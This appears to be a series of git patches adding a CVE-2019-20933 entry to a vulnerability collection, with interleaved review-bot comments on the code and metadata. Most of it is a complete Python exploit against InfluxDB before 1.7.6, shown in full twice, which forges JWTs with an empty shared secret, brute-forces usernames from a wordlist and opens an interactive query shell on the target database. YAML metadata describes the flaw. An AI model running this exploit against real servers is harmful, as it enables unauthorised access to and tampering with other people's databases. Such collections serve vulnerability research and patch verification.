From: Zentung0628 Date: Wed, 15 Mar 2023 05:48:02 +0000 Subject: [PATCH 29/40] =?UTF-8?q?=E6=96=B0=E5=BB=BA=20CVE-2019-20933?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/InfluxDB/2019/CVE-2019-20933/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 cve/InfluxDB/2019/CVE-2019-20933/.keep diff --git a/cve/InfluxDB/2019/CVE-2019-20933/.keep b/cve/InfluxDB/2019/CVE-2019-20933/.keep new file mode 100644 index 00000000..e69de29b -- Gitee From 8db8a26eefa3fe042151ef54efb5b5559ebdc859 Mon Sep 17 00:00:00 2001 From: Zentung0628 Date: Wed, 15 Mar 2023 05:48:18 +0000 Subject: [PATCH 30/40] CVE-2019-20933 Signed-off-by: Zentung0628 --- cve/InfluxDB/2019/CVE-2019-20933/README.md | 16 ++ cve/InfluxDB/2019/CVE-2019-20933/__main__.py | 185 ++++++++++++++++++ .../2019/CVE-2019-20933/requirements.txt | 4 + cve/InfluxDB/2019/CVE-2019-20933/users.txt | 7 + 4 files changed, 212 insertions(+) create mode 100644 cve/InfluxDB/2019/CVE-2019-20933/README.md create mode 100644 cve/InfluxDB/2019/CVE-2019-20933/__main__.py create mode 100644 cve/InfluxDB/2019/CVE-2019-20933/requirements.txt create mode 100644 cve/InfluxDB/2019/CVE-2019-20933/users.txt diff --git a/cve/InfluxDB/2019/CVE-2019-20933/README.md b/cve/InfluxDB/2019/CVE-2019-20933/README.md new file mode 100644 index 00000000..dad0665f --- /dev/null +++ b/cve/InfluxDB/2019/CVE-2019-20933/README.md 
@@ -0,0 +1,16 @@ +# InfluxDB Exploit CVE-2019-20933 + +Exploit for InfluxDB CVE-2019-20933 vulnerability, InfluxDB before 1.7.6 has an authentication bypass vulnerability in the authenticate function in services/httpd/handler.go because a JWT token may have an empty SharedSecret (aka shared secret). +Exploit check if server is vulnerable, then it tries to get a remote query shell. It has built in a username bruteforce service. + +## Installation +``` +git clone https://github.com/LorenzoTullini/InfluxDB-Exploit-CVE-2019-20933.git +cd InfluxDB-Exploit-CVE-2019-20933 +pip install -r requirements.txt +``` + +## Usage +``` +python __main__.py +``` diff --git a/cve/InfluxDB/2019/CVE-2019-20933/__main__.py b/cve/InfluxDB/2019/CVE-2019-20933/__main__.py new file mode 100644 index 00000000..e38d12f4 --- /dev/null +++ b/cve/InfluxDB/2019/CVE-2019-20933/__main__.py 
@@ -0,0 +1,185 @@ +#!/bin/env python + +import json +import pathlib +import time +import urllib +import requests as requests +import jwt +from termcolor import colored + +def bruteforceUser(filename, host, port): + print() + print("Bruteforcing usernames ...") + with open(filename) as f: + for line in f: + line = line.replace("\n", "") + exp = int(time.time()) + exp = exp + 2.628 * 10 ** 6 + # Generation JWT + payload = { + "username": line, + "exp": exp + } + + token = jwt.encode(payload, "", algorithm="HS256") + query = "SHOW DATABASES" + response = makeQuery(token, 'dummy', host, port, query) + response = json.loads(response) + if "error" in response.keys(): + if "signature is invalid" in response['error']: + print(colored("ERROR: Host not vulnerable !!!", "red")) + print(colored("ERROR: " + response['error'] + "", "red")) + exit(1) + if "user not found" in response['error']: + print("[{}] {}".format(colored("x", "red"), line)) + else: + print("[{}] {}".format(colored("v", "green"), line)) + print() + username = line + return username + + print(colored("ERROR: no valid username found !!!", "red")) + exit(1) + +def makeQuery(token, db, host, port, query): + try: + headers = { + 'Authorization': 'Bearer ' + token, + } + except: + token = token.decode("utf-8") + headers = { + 'Authorization': 'Bearer ' + token, + } + + # Send request + query = urllib.parse.quote_plus(query) + response = requests.get('http://' + host + ':' + str(port) + '/query?db=' + db + '&q=' + query, headers=headers) + return response.text + +def exploit(): + # imput data + print() + try: + host = input("Host (default: localhost): ") + except KeyboardInterrupt: + return + + if host == "": + host = "127.0.0.1" + + try: + port = input("Port (default: 8086): ") + except KeyboardInterrupt: + return + if port == "": + port = 8086 + + try: + username = input("Username path to username file (default: users.txt): ") + except KeyboardInterrupt: + return + + if username == "": + username = "users.txt" + + 
# check if username is a valid file to start bruteforce + file = pathlib.Path(username) + if file.exists(): + username = bruteforceUser(username, host, port) + + exp = int(time.time()) + exp = exp + 2.628 * 10 ** 6 # Aggiungo un mese + + # Generation JWT + payload = { + "username": username, + "exp": exp + } + + token = jwt.encode(payload, "", algorithm="HS256") + #print("Token: {}".format(token)) + query = "SHOW DATABASES" + response = makeQuery(token, 'dummy', host, port, query) + response = json.loads(response) + + if "results" in response.keys(): + print(colored("Host vulnerable !!!", "green")) + else: + print(colored("ERROR: Host not vulnerable !!!", "red")) + print(colored("ERROR: "+response['error']+"", "red")) + return + + # Get databases list + dblist = [db[0] for db in response['results'][0]['series'][0]['values']] + + while True: + print() + print("Databases:") + print() + for (i, db) in enumerate(dblist): + print("{}) {}".format(i + 1, db)) + + print() + print(".quit to exit") + + + try: + db = input("[{}@{}] Database: ".format(colored(username, "red"), colored(host, "yellow"))) + except KeyboardInterrupt: + print() + print("~ Bye!") + break + + try: + db = dblist[int(db) - 1] + except IndexError as e: + # Prompt again if database index if not in range + continue + except Exception as e: + # Check if database exists if its a string + if db.strip() == "": + continue + if db not in dblist: + print(colored("[Error] ", "red") + "No such database: \"" + colored(db, "yellow") + "\"") + continue + pass + + if db in ['.exit', '.quit', '.back']: + return + if db == "": + continue + + print() + print("Starting InfluxDB shell - .back to go back") + while True: + try: + query = input("[{}@{}/{}] $ ".format(colored(username, "red"), colored(host, "yellow"), colored(db, "blue"))) + except KeyboardInterrupt: + break + + if query.strip() == "": + continue + + if query in ['.exit', '.quit', '.back']: + break + + response = makeQuery(token, db, host, port, query) + 
response = json.loads(response) + print(json.dumps(response, indent=4, sort_keys=True)) + + +if __name__ == '__main__': + print(colored(""" + _____ __ _ _____ ____ ______ _ _ _ + |_ _| / _| | | __ \| _ \ | ____| | | (_) | + | | _ __ | |_| |_ ___ __ | | | |_) | | |__ __ ___ __ | | ___ _| |_ + | | | '_ \| _| | | | \ \/ / | | | _ < | __| \ \/ / '_ \| |/ _ \| | __| + _| |_| | | | | | | |_| |> <| |__| | |_) | | |____ > <| |_) | | (_) | | |_ + |_____|_| |_|_| |_|\__,_/_/\_\_____/|____/ |______/_/\_\ .__/|_|\___/|_|\__| + | | + |_| """, 'green')) + print(colored(" - using CVE-2019-20933", "yellow")) + + exploit() diff --git a/cve/InfluxDB/2019/CVE-2019-20933/requirements.txt b/cve/InfluxDB/2019/CVE-2019-20933/requirements.txt new file mode 100644 index 00000000..a345330c --- /dev/null +++ b/cve/InfluxDB/2019/CVE-2019-20933/requirements.txt @@ -0,0 +1,4 @@ +urllib3 +requests +PyJWT +termcolor diff --git a/cve/InfluxDB/2019/CVE-2019-20933/users.txt b/cve/InfluxDB/2019/CVE-2019-20933/users.txt new file mode 100644 index 00000000..802b77da --- /dev/null +++ b/cve/InfluxDB/2019/CVE-2019-20933/users.txt @@ -0,0 +1,7 @@ +admin +user +root +database +db +influx +influxdb -- Gitee From ef22a232a370d3afb851359becd2d07cfe03eab1 Mon Sep 17 00:00:00 2001 From: Zentung0628 Date: Wed, 15 Mar 2023 05:48:23 +0000 Subject: [PATCH 31/40] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cv?= =?UTF-8?q?e/InfluxDB/2019/CVE-2019-20933/.keep?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/InfluxDB/2019/CVE-2019-20933/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) delete mode 100644 cve/InfluxDB/2019/CVE-2019-20933/.keep diff --git a/cve/InfluxDB/2019/CVE-2019-20933/.keep b/cve/InfluxDB/2019/CVE-2019-20933/.keep deleted file mode 100644 index e69de29b..00000000 -- Gitee From 3078f993033137496000713d6fa5deb2c5a28cee Mon Sep 17 00:00:00 2001 
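Review bot: The `.quit`/`.exit`/`.back` sentinels never reach the `if db in ['.exit', '.quit', '.back']: return` check in exploit(): `int(db)` raises ValueError first, the `except Exception` branch finds the string is not in dblist, prints "No such database" and `continue`s, so the advertised ".quit to exit" only works via Ctrl-C. Move the sentinel test ahead of the parse, `if db.strip() in ['.exit', '.quit', '.back']: return` directly after the `input(...)` call, and reject `int(db) - 1 < 0`, because `0` or a negative number currently indexes from the end of dblist and silently selects a database. In makeQuery the bare `except:` around the header dict should be `if isinstance(token, bytes): token = token.decode("utf-8")` (PyJWT < 2 returns bytes, PyJWT >= 2 returns str), and `requests.get(...)` should pass a `timeout=` so an unresponsive host does not hang the tool. `import urllib` should be `import urllib.parse`, since `urllib.parse` is in practice only loaded because requests imports it, and the unguarded `json.loads(response)` calls in both functions raise json.JSONDecodeError on any non-JSON body such as a proxy or 404 page; the `exit(1)` calls should be `sys.exit(1)` with `import sys`, as the `exit` builtin is installed by the site module rather than by the language.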
From: Zentung0628 Date: Wed, 15 Mar 2023 05:48:29 +0000 Subject: [PATCH 32/40] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cv?= =?UTF-8?q?e/InfluxDB/2019/.keep?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/InfluxDB/2019/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) delete mode 100644 cve/InfluxDB/2019/.keep diff --git a/cve/InfluxDB/2019/.keep b/cve/InfluxDB/2019/.keep deleted file mode 100644 index e69de29b..00000000 -- Gitee From 6144a6a9367bcd70ff0dec12becb2023654ebcb6 Mon Sep 17 00:00:00 2001 From: Zentung0628 Date: Wed, 15 Mar 2023 05:49:05 +0000 Subject: [PATCH 33/40] =?UTF-8?q?=E6=96=B0=E5=BB=BA=20yaml?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/InfluxDB/2019/yaml/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 cve/InfluxDB/2019/yaml/.keep diff --git a/cve/InfluxDB/2019/yaml/.keep b/cve/InfluxDB/2019/yaml/.keep new file mode 100644 index 00000000..e69de29b -- Gitee From b19aedfbcbcb0cc7ce8d4d3c63fc719473fdd368 Mon Sep 17 00:00:00 2001 From: Zentung0628 Date: Wed, 15 Mar 2023 05:49:27 +0000 Subject: [PATCH 34/40] CVE-2019-20933 yaml Signed-off-by: Zentung0628 --- cve/InfluxDB/2019/yaml/CVE-2019-20933.yaml | 19 +++++++++++++++++++ 1 file changed, 19 insertions(+) create mode 100644 cve/InfluxDB/2019/yaml/CVE-2019-20933.yaml diff --git a/cve/InfluxDB/2019/yaml/CVE-2019-20933.yaml b/cve/InfluxDB/2019/yaml/CVE-2019-20933.yaml new file mode 100644 index 00000000..6a0ff454 --- /dev/null +++ b/cve/InfluxDB/2019/yaml/CVE-2019-20933.yaml 
@@ -0,0 +1,19 @@
+id: CVE-2019-20933
+source: https://github.com/LorenzoTullini/InfluxDB-Exploit-CVE-2019-20933
+info:
+ name: InfluxDB 1.7.6之前版本中的services/httpd/handler.go中的authenticate函数存在认证绕过漏洞。该漏洞源于JWT令牌可能具有空SharedSecret。攻击者可利用该漏洞绕过认证。
+ severity: critical
+ description: |
+ InfluxDB before 1.7.6 has an authentication bypass vulnerability in the authenticate function in services/httpd/handler.go because a JWT token may have an empty SharedSecret (aka shared secret).
+ scope-of-influence:
+ InfluxData InfluxDB <1.7.6
+ reference:
+ - https://nvd.nist.gov/vuln/detail/CVE-2019-20933
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 9.8
+ cve-id: CVE-2019-20933
+ cwe-id: CWE-287
+ cnvd-id: CNVD-2022-06547
+ kve-id: None
+ tags: RCE, cve2019, 任意文件读取
\ No newline at end of file
-- Gitee From eadacbf6148d72b6b19c808bac0cde63505c6802 Mon Sep 17 00:00:00 2001 From: Zentung0628 Date: Wed, 15 Mar 2023 05:49:31 +0000 Subject: [PATCH 35/40] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cv?= =?UTF-8?q?e/InfluxDB/2019/yaml/.keep?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/InfluxDB/2019/yaml/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) delete mode 100644 cve/InfluxDB/2019/yaml/.keep
diff --git a/cve/InfluxDB/2019/yaml/.keep b/cve/InfluxDB/2019/yaml/.keep deleted file mode 100644
index e69de29b..00000000
-- Gitee From e4427ab07a1fa9ef0a4b92a0603db4fcbab06b3c Mon Sep 17 00:00:00 2001 From: Zentung0628 Date: Wed, 15 Mar 2023 05:49:49 +0000 Subject: [PATCH 36/40] update cve/InfluxDB/2019/yaml/CVE-2019-20933.yaml. Signed-off-by: Zentung0628 --- cve/InfluxDB/2019/yaml/CVE-2019-20933.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/cve/InfluxDB/2019/yaml/CVE-2019-20933.yaml b/cve/InfluxDB/2019/yaml/CVE-2019-20933.yaml
index 6a0ff454..7902e771 100644
--- a/cve/InfluxDB/2019/yaml/CVE-2019-20933.yaml
+++ b/cve/InfluxDB/2019/yaml/CVE-2019-20933.yaml
@@ -6,7 +6,7 @@ info: description: | InfluxDB before 1.7.6 has an authentication bypass vulnerability in the authenticate function in services/httpd/handler.go because a JWT token may have an empty SharedSecret (aka shared secret). scope-of-influence: - InfluxData InfluxDB <1.7.6 + InfluxData InfluxDB <1.7.6 reference: - https://nvd.nist.gov/vuln/detail/CVE-2019-20933 classification: -- Gitee From 4718da04a29b95aeb86cdf817f25c0923725fcd5 Mon Sep 17 00:00:00 2001 From: Zentung0628 Date: Wed, 15 Mar 2023 05:49:58 +0000 Subject: [PATCH 37/40] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cv?= =?UTF-8?q?e/InfluxDB/CVE-2019-20933?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/InfluxDB/CVE-2019-20933/README.md | 16 -- cve/InfluxDB/CVE-2019-20933/__main__.py | 185 ------------------- cve/InfluxDB/CVE-2019-20933/requirements.txt | 4 - cve/InfluxDB/CVE-2019-20933/users.txt | 7 - 4 files changed, 212 deletions(-) delete mode 100644 cve/InfluxDB/CVE-2019-20933/README.md delete mode 100644 cve/InfluxDB/CVE-2019-20933/__main__.py delete mode 100644 cve/InfluxDB/CVE-2019-20933/requirements.txt delete mode 100644 cve/InfluxDB/CVE-2019-20933/users.txt diff --git a/cve/InfluxDB/CVE-2019-20933/README.md b/cve/InfluxDB/CVE-2019-20933/README.md deleted file mode 100644 index dad0665f..00000000 --- a/cve/InfluxDB/CVE-2019-20933/README.md +++ /dev/null 
@@ -1,16 +0,0 @@ -# InfluxDB Exploit CVE-2019-20933 - -Exploit for InfluxDB CVE-2019-20933 vulnerability, InfluxDB before 1.7.6 has an authentication bypass vulnerability in the authenticate function in services/httpd/handler.go because a JWT token may have an empty SharedSecret (aka shared secret). -Exploit check if server is vulnerable, then it tries to get a remote query shell. It has built in a username bruteforce service. - -## Installation -``` -git clone https://github.com/LorenzoTullini/InfluxDB-Exploit-CVE-2019-20933.git -cd InfluxDB-Exploit-CVE-2019-20933 -pip install -r requirements.txt -``` - -## Usage -``` -python __main__.py -``` diff --git a/cve/InfluxDB/CVE-2019-20933/__main__.py b/cve/InfluxDB/CVE-2019-20933/__main__.py deleted file mode 100644 index e38d12f4..00000000 --- a/cve/InfluxDB/CVE-2019-20933/__main__.py +++ /dev/null 
@@ -1,185 +0,0 @@ -#!/bin/env python - -import json -import pathlib -import time -import urllib -import requests as requests -import jwt -from termcolor import colored - -def bruteforceUser(filename, host, port): - print() - print("Bruteforcing usernames ...") - with open(filename) as f: - for line in f: - line = line.replace("\n", "") - exp = int(time.time()) - exp = exp + 2.628 * 10 ** 6 - # Generation JWT - payload = { - "username": line, - "exp": exp - } - - token = jwt.encode(payload, "", algorithm="HS256") - query = "SHOW DATABASES" - response = makeQuery(token, 'dummy', host, port, query) - response = json.loads(response) - if "error" in response.keys(): - if "signature is invalid" in response['error']: - print(colored("ERROR: Host not vulnerable !!!", "red")) - print(colored("ERROR: " + response['error'] + "", "red")) - exit(1) - if "user not found" in response['error']: - print("[{}] {}".format(colored("x", "red"), line)) - else: - print("[{}] {}".format(colored("v", "green"), line)) - print() - username = line - return username - - print(colored("ERROR: no valid username found !!!", "red")) - exit(1) - -def makeQuery(token, db, host, port, query): - try: - headers = { - 'Authorization': 'Bearer ' + token, - } - except: - token = token.decode("utf-8") - headers = { - 'Authorization': 'Bearer ' + token, - } - - # Send request - query = urllib.parse.quote_plus(query) - response = requests.get('http://' + host + ':' + str(port) + '/query?db=' + db + '&q=' + query, headers=headers) - return response.text - -def exploit(): - # imput data - print() - try: - host = input("Host (default: localhost): ") - except KeyboardInterrupt: - return - - if host == "": - host = "127.0.0.1" - - try: - port = input("Port (default: 8086): ") - except KeyboardInterrupt: - return - if port == "": - port = 8086 - - try: - username = input("Username path to username file (default: users.txt): ") - except KeyboardInterrupt: - return - - if username == "": - username = "users.txt" - - 
# check if username is a valid file to start bruteforce - file = pathlib.Path(username) - if file.exists(): - username = bruteforceUser(username, host, port) - - exp = int(time.time()) - exp = exp + 2.628 * 10 ** 6 # Aggiungo un mese - - # Generation JWT - payload = { - "username": username, - "exp": exp - } - - token = jwt.encode(payload, "", algorithm="HS256") - #print("Token: {}".format(token)) - query = "SHOW DATABASES" - response = makeQuery(token, 'dummy', host, port, query) - response = json.loads(response) - - if "results" in response.keys(): - print(colored("Host vulnerable !!!", "green")) - else: - print(colored("ERROR: Host not vulnerable !!!", "red")) - print(colored("ERROR: "+response['error']+"", "red")) - return - - # Get databases list - dblist = [db[0] for db in response['results'][0]['series'][0]['values']] - - while True: - print() - print("Databases:") - print() - for (i, db) in enumerate(dblist): - print("{}) {}".format(i + 1, db)) - - print() - print(".quit to exit") - - - try: - db = input("[{}@{}] Database: ".format(colored(username, "red"), colored(host, "yellow"))) - except KeyboardInterrupt: - print() - print("~ Bye!") - break - - try: - db = dblist[int(db) - 1] - except IndexError as e: - # Prompt again if database index if not in range - continue - except Exception as e: - # Check if database exists if its a string - if db.strip() == "": - continue - if db not in dblist: - print(colored("[Error] ", "red") + "No such database: \"" + colored(db, "yellow") + "\"") - continue - pass - - if db in ['.exit', '.quit', '.back']: - return - if db == "": - continue - - print() - print("Starting InfluxDB shell - .back to go back") - while True: - try: - query = input("[{}@{}/{}] $ ".format(colored(username, "red"), colored(host, "yellow"), colored(db, "blue"))) - except KeyboardInterrupt: - break - - if query.strip() == "": - continue - - if query in ['.exit', '.quit', '.back']: - break - - response = makeQuery(token, db, host, port, query) - 
response = json.loads(response) - print(json.dumps(response, indent=4, sort_keys=True)) - - -if __name__ == '__main__': - print(colored(""" - _____ __ _ _____ ____ ______ _ _ _ - |_ _| / _| | | __ \| _ \ | ____| | | (_) | - | | _ __ | |_| |_ ___ __ | | | |_) | | |__ __ ___ __ | | ___ _| |_ - | | | '_ \| _| | | | \ \/ / | | | _ < | __| \ \/ / '_ \| |/ _ \| | __| - _| |_| | | | | | | |_| |> <| |__| | |_) | | |____ > <| |_) | | (_) | | |_ - |_____|_| |_|_| |_|\__,_/_/\_\_____/|____/ |______/_/\_\ .__/|_|\___/|_|\__| - | | - |_| """, 'green')) - print(colored(" - using CVE-2019-20933", "yellow")) - - exploit() diff --git a/cve/InfluxDB/CVE-2019-20933/requirements.txt b/cve/InfluxDB/CVE-2019-20933/requirements.txt deleted file mode 100644 index a345330c..00000000 --- a/cve/InfluxDB/CVE-2019-20933/requirements.txt +++ /dev/null @@ -1,4 +0,0 @@ -urllib3 -requests -PyJWT -termcolor diff --git a/cve/InfluxDB/CVE-2019-20933/users.txt b/cve/InfluxDB/CVE-2019-20933/users.txt deleted file mode 100644 index 802b77da..00000000 --- a/cve/InfluxDB/CVE-2019-20933/users.txt +++ /dev/null @@ -1,7 +0,0 @@ -admin -user -root -database -db -influx -influxdb -- Gitee From 1593a0b1b81b6b1e6b6f725ce5470b51272216a3 Mon Sep 17 00:00:00 2001 From: Zentung0628 Date: Wed, 15 Mar 2023 05:50:03 +0000 Subject: [PATCH 38/40] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cv?= =?UTF-8?q?e/InfluxDB/yaml?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/InfluxDB/yaml/CVE-2019-20933.yaml | 19 ------------------- 1 file changed, 19 deletions(-) delete mode 100644 cve/InfluxDB/yaml/CVE-2019-20933.yaml diff --git a/cve/InfluxDB/yaml/CVE-2019-20933.yaml b/cve/InfluxDB/yaml/CVE-2019-20933.yaml deleted file mode 100644 index 7902e771..00000000 --- a/cve/InfluxDB/yaml/CVE-2019-20933.yaml +++ /dev/null 
@@ -1,19 +0,0 @@ -id: CVE-2019-20933 -source: https://github.com/LorenzoTullini/InfluxDB-Exploit-CVE-2019-20933 -info: - name: InfluxDB 1.7.6之前版本中的services/httpd/handler.go中的authenticate函数存在认证绕过漏洞。该漏洞源于JWT令牌可能具有空SharedSecret。攻击者可利用该漏洞绕过认证。 - severity: critical - description: | - InfluxDB before 1.7.6 has an authentication bypass vulnerability in the authenticate function in services/httpd/handler.go because a JWT token may have an empty SharedSecret (aka shared secret). - scope-of-influence: - InfluxData InfluxDB <1.7.6 - reference: - - https://nvd.nist.gov/vuln/detail/CVE-2019-20933 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2019-20933 - cwe-id: CWE-287 - cnvd-id: CNVD-2022-06547 - kve-id: None - tags: RCE, cve2019, 任意文件读取 \ No newline at end of file -- Gitee From 78964b9549cbc9266c102aee20fb7dedcdaaa796 Mon Sep 17 00:00:00 2001 From: Zentung0628 Date: Wed, 15 Mar 2023 05:54:17 +0000 Subject: [PATCH 39/40] update oslist.yaml Signed-off-by: Zentung0628 --- openkylin_list.yaml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/openkylin_list.yaml b/openkylin_list.yaml index 127b8584..023c281e 100644 --- a/openkylin_list.yaml +++ b/openkylin_list.yaml @@ -17,6 +17,8 @@ cve: - CVE-2022-33891 apache-tomcat: - CVE-2020-13935 + Influx-DB: + - CVE-2019-20933 linux-kernel: - CVE-2021-4204 - CVE-2021-22555 -- Gitee From 84451f8437596455bfa5366342d389d55df96538 Mon Sep 17 00:00:00 2001 From: Zentung0628 Date: Wed, 15 Mar 2023 07:04:18 +0000 Subject: [PATCH 40/40] update cve/InfluxDB/2019/yaml/CVE-2019-20933.yaml. Signed-off-by: Zentung0628 --- cve/InfluxDB/2019/yaml/CVE-2019-20933.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cve/InfluxDB/2019/yaml/CVE-2019-20933.yaml b/cve/InfluxDB/2019/yaml/CVE-2019-20933.yaml index 7902e771..eaf35209 100644 --- a/cve/InfluxDB/2019/yaml/CVE-2019-20933.yaml +++ b/cve/InfluxDB/2019/yaml/CVE-2019-20933.yaml 
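Review bot: The new key `Influx-DB:` in openkylin_list.yaml does not follow the naming of its siblings in the same hunk (`apache-tomcat`, `linux-kernel`: lowercase, product name as one token) nor the directory name `cve/InfluxDB` used throughout this series; `influxdb:` would match both conventions. Whether a consumer keys on this string cannot be told from the hunk, but a mismatch between the list key and the directory name is the kind of thing that breaks lookups silently.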
@@ -16,4 +16,4 @@ info:
 cwe-id: CWE-287
 cnvd-id: CNVD-2022-06547
 kve-id: None
- tags: RCE, cve2019, 任意文件读取
\ No newline at end of file
+ tags: RCE, cve2019, 认证机制不恰当
\ No newline at end of file
-- Gitee
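Review bot: The `RCE` tag is not supported by anything else in this file: the description and `cwe-id: CWE-287` describe an authentication bypass, and this hunk only replaces the third tag, so `tags: RCE, cve2019, 认证机制不恰当` still advertises code execution that the record does not document. Either drop `RCE` or add a reference under `reference:` that establishes it. `kve-id: None` is parsed by YAML as the string "None" rather than a null value; `kve-id: null` (or `~`) is the unambiguous form if the consumer expects an absent identifier. The file still ends without a trailing newline (`\ No newline at end of file`), which this edit of the last line could have fixed.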